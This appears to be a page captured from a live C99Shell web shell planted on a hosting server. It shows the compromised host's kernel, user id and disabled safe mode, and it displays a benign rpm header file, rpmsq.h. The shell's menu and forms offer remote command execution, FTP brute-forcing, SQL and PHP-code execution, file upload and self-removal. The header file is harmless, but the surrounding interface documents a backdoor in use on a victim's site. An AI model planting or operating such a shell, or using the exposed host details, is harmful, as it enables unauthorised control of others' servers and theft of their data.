!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/include/rpm/   drwxr-xr-x
Free 6182.19 GB of 6263.39 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rpmsq.h (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#ifndef    H_RPMSQ
#define    H_RPMSQ

/** \ingroup rpmio
 * \file rpmio/rpmsq.h
 *
 * Signal Queue API
 */
#include <rpm/rpmsw.h>
#include <signal.h>

#ifdef __cplusplus
extern "C" {
#endif

/** \ingroup rpmsq
 * Default signal handler prototype.
 * @param signum    signal number
 * @param info        (siginfo_t) signal info
 * @param context    signal context
 */
typedef void (*rpmsqAction_t) (int signum, siginfo_t * info, void * context);

/** \ingroup rpmsq
 *  SIG_DFL, SIG_IGN and SIG_ERR counterparts
 */
#define RPMSQ_DFL    ((rpmsqAction_t)0)
#define RPMSQ_IGN    ((rpmsqAction_t)1)
#define RPMSQ_ERR    ((rpmsqAction_t)-1)

/** \ingroup rpmsq
 * Test if given signal has been caught (while signals blocked).
 * Similar to sigismember() but operates on internal signal queue.
 * @param signum    signal to test for
 * @return        1 if caught, 0 if not and -1 on error
 */
int rpmsqIsCaught(int signum);

/** \ingroup rpmsq
 * Activate (or disable) the signal queue.
 * @param state        1 to enable, 0 to disable
 * @return        0 on success, negative on error
 */
int rpmsqActivate(int state);

/** \ingroup rpmsq
 * Set or delete a signal handler for a signal.
 * @param signum    signal number
 * @param handler    signal handler or NULL to delete
 * @return        previous handler, RPMSQ_ERR on error
 */
rpmsqAction_t rpmsqSetAction(int signum, rpmsqAction_t handler);

/** \ingroup rpmsq
 * Block or unblock (almost) all signals.
 * The operation is "reference counted" so the calls can be nested,
 * and signals are only unblocked when the reference count falls to zero.
 * @param op        SIG_BLOCK/SIG_UNBLOCK
 * @return        0 on success, -1 on error
 */
int rpmsqBlock(int op);

/** \ingroup rpmsq
 * Poll for caught signals, executing their handlers.
 * @return        no. active signals found
 */
int rpmsqPoll(void);

void rpmsqSetInterruptSafety(int on);

#ifdef __cplusplus
}
#endif

#endif    /* H_RPMSQ */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0137 ]--